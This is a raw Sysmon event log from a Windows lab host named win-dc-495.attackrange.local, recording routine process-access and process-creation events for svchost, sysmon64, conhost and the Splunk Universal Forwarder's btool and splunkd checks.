13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8EE5-6005-C500-00000000A301}38004672C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE5-6005-C600-00000000A301}4576C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.120{59A5CD1D-8EE5-6005-C600-00000000A301}4576C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE5-6005-C500-00000000A301}3800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000003835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-C500-00000000A301}3800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-C500-00000000A301}3800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE5-6005-C500-00000000A301}3800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.114{59A5CD1D-8EE5-6005-C500-00000000A301}3800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.077{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8EE4-6005-C400-00000000A301}3508C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.061{59A5CD1D-8EE4-6005-C400-00000000A301}35083796C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-D300-00000000A301}4720C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
